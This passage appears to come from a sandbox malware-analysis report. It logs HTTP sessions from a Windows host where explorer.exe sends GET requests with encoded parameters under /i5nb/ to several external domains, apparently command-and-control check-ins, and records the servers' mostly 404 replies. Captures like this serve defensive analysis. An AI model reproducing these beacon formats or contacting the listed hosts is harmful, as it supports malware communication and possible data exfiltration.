                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 
6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 39 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 3e
                                                  Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120">
Jan 13, 2022 20:23:06.319129944 CET | 501 | IN | Data Raw: 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 35 32 2e 70 6e 67 22
                                                  Data Ascii: <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x180"> <link href="/cgi-sys/css/bootstrap.min.


Session ID: 5 | Source IP: 192.168.2.22 | Source Port: 49172 | Destination IP: 192.185.98.251 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2022 20:23:11.619415045 CET | 501 | OUT | GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1
                                                  Host: www.ecommerceoptimise.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
Jan 13, 2022 20:23:11.771730900 CET | 503 | IN | HTTP/1.1 404 Not Found
                                                  Date: Thu, 13 Jan 2022 19:23:11 GMT
                                                  Server: Apache
                                                  Upgrade: h2,h2c
                                                  Connection: Upgrade, close
                                                  Last-Modified: Fri, 14 Feb 2020 00:55:46 GMT
                                                  Accept-Ranges: bytes
                                                  Content-Length: 11816
                                                  Vary: Accept-Encoding
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 
68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 67 61 74 6f 72 62 6f 74 74 6f 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6c 65 66 74 3a 33 39 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 78 78 78 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 20 33 39 37 70 78 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 61 75 74
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 - PAGE NOT FOUND</title>... Add Slide Outs --><script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="/cgi-sys/js/simple-expand.min.js"></script> <style type="text/css"> body{padding:0;margin:0;font-family:helvetica;} #container{margin:20px auto;width:868px;} #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;} #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;} #container #mid404 #gatorbottom{position:relative;left:39px;float:left;} #container #mid404 #xxx{float:left;padding:40px 397px 10px; margin: auto aut
Jan 13, 2022 20:23:11.771794081 CET | 504 | IN | Data Raw: 6f 20 2d 31 30 70 78 20 61 75 74 6f 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 63 6f 6e 74 65 6e 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 69 64
                                                  Data Ascii: o -10px auto} #container #mid404 #content{float:left;text-align:center;width:868px;} #container #mid404 #content #errorcode{font-size:30px;font-weight:800;} #container #mid404 #content #banner{margin:20px 0 0 ;}
Jan 13, 2022 20:23:11.771842003 CET | 506 | IN | Data Raw: 6f 6e 20 68 33 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 7d 0a 09 09 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 63 6f 6e 74 65 6e 74 20 23 61 63 63 6f 72 64 69 6f 6e 20 68 34 20 7b 66 6f 6e 74 2d 77 65 69
                                                  Data Ascii: on h3 {font-weight: bold;} #container #mid404 #content #accordion h4 {font-weight: bold; font-style: italic; text-align: left;} .content {display:none;} .first {color: #ff6600;} .second {color: #3b5998;} .third {color: #198
Jan 13, 2022 20:23:11.771881104 CET | 507 | IN | Data Raw: 2f 2f 69 70 2f 7e 75 73 65 72 6e 61 6d 65 2f 29 20 61 6e 64 20 67 65 74 20 74 68 69 73 20 65 72 72 6f 72 2c 20 74 68 65 72 65 20 6d 61 79 62 65 20 61 20 70 72 6f 62 6c 65 6d 20 77 69 74 68 20 74 68 65 20 72 75 6c 65 20 73 65 74 20 73 74 6f 72 65
                                                  Data Ascii: //ip/~username/) and get this error, there maybe a problem with the rule set stored in an .htaccess file. You can try renaming that file to .htaccess-backup and refreshing the site to see if that resolves the issue.</p><p>It is also
Jan 13, 2022 20:23:11.771924973 CET | 508 | IN | Data Raw: 65 20 69 6e 20 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 61 64 64 6f 6e 64 6f 6d 61 69 6e 2e 63 6f 6d 2f 65 78 61 6d 70 6c 65 2f 45 78 61 6d 70 6c 65 2f 20 61 6e 64 20 74 68 65 20 6e 61 6d 65 73 20 61 72 65 20 63 61 73 65 2d 73 65 6e 73 69 74 69 76 65
                                                  Data Ascii: e in public_html/addondomain.com/example/Example/ and the names are case-sensitive.</p><h4><u>Broken Image</u></h4><p>When you have a missing image on your site you may see a box on your page with with a red <span style="colo
Jan 13, 2022 20:23:11.771965027 CET | 510 | IN | Data Raw: 20 61 20 6e 65 77 20 74 68 65 6d 65 20 68 61 73 20 62 65 65 6e 20 61 63 74 69 76 61 74 65 64 20 6f 72 20 77 68 65 6e 20 74 68 65 20 72 65 77 72 69 74 65 20 72 75 6c 65 73 20 69 6e 20 74 68 65 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 68 61
                                                  Data Ascii: a new theme has been activated or when the rewrite rules in the .htaccess file have been altered.</p><p>When you encounter a 404 error in WordPress, you have two options for correcting it.</p><h4><u>Option 1: Correct the Pe
Jan 13, 2022 20:23:11.772003889 CET | 511 | IN | Data Raw: 09 09 09 09 09 09 09 52 65 77 72 69 74 65 45 6e 67 69 6e 65 20 4f 6e 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 52 65 77 72 69 74 65 42 61 73 65 20 2f 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 52 65 77 72 69 74 65 52 75 6c 65 20 5e 69 6e 64
                                                  Data Ascii: RewriteEngine On<br>RewriteBase /<br>RewriteRule ^index.php$ - [L]<br>RewriteCond %{REQUEST_FILENAME} !-f<br>RewriteCond %{REQUEST_FILENAME} !-d<br>RewriteRule . /index.php [L]<br>
Jan 13, 2022 20:23:11.772044897 CET | 513 | IN | Data Raw: 63 68 61 6e 67 65 64 2e 28 59 6f 75 20 6d 61 79 20 6e 65 65 64 20 74 6f 20 63 6f 6e 73 75 6c 74 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 6e 64 20 72 65 73 6f 75 72 63 65 73 20 66 6f 72 20 74 68 61 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e
                                                  Data Ascii: changed.(You may need to consult other articles and resources for that information.)</p><h4><u>There are Many Ways to Edit a .htaccess File</u></h4><ul><li>Edit the file on your computer and upload it to the serve
Jan 13, 2022 20:23:11.772088051 CET | 514 | IN | Data Raw: 73 74 20 6f 66 20 66 69 6c 65 73 2e 20 59 6f 75 20 6d 61 79 20 6e 65 65 64 20 74 6f 20 73 63 72 6f 6c 6c 20 74 6f 20 66 69 6e 64 20 69 74 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 3c 2f 6f 6c 3e 0a 09 09 09 09 09 09 09 09 3c 68 34 3e 3c 75 3e
                                                  Data Ascii: st of files. You may need to scroll to find it.</li></ol><h4><u>To Edit the .htaccess File</u></h4><ol><li>Right click on the <strong>.htaccess file</strong> and click&nbsp;<strong>Code Edit</strong> from t
Jan 13, 2022 20:23:11.772109985 CET | 514 | IN | Data Raw: 20 7d 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: }); </script></body></html>


Session ID: 6 | Source IP: 192.168.2.22 | Source Port: 49174 | Destination IP: 221.121.143.148 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2022 20:23:17.360008955 CET | 515 | OUT | GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1
                                                  Host: www.integratedheartspsychology.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
Jan 13, 2022 20:23:17.639343023 CET | 516 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Thu, 13 Jan 2022 19:23:17 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 
78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name chang
Jan 13, 2022 20:23:17.639389992 CET | 516 | IN | Data Raw: 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74
                                                  Data Ascii: ed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID: 7 | Source IP: 192.168.2.22 | Source Port: 49175 | Destination IP: 23.80.120.93 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2022 20:23:23.008996964 CET | 517 | OUT | GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1
                                                  Host: www.bjbwx114.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
Jan 13, 2022 20:23:23.537935019 CET | 519 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 13 Jan 2022 19:23:13 GMT
                                                  Content-Length: 1795
                                                  Content-Type: text/html
                                                  Server: nginx
                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 c1 d9 e2 a2 d0 cb ce bb bf c6 bc bc d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 30 31 32 37 3b 26 23 32 39 33 37 38 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 35 37 30 3b 26 23 32 39 32 33 32 3b 26 23 32 30 38 34 30 3b 26 23 33 36 38 30 37 3b 26 23 33 31 32 34 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 36 35 3b 26 23 38 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 31 35 36 30 3b 26 23 33 30 35 32 38 3b 26 23 32 32 39 30 32 3b 26 23 32 37 37 30 30 3b 26 23 32 30 35 37 30 3b 26 23 33 30 35 32 38 3b 26 23 32 39 32 33 33 3b 26 23 33 35 32 37 30 3b 26 23 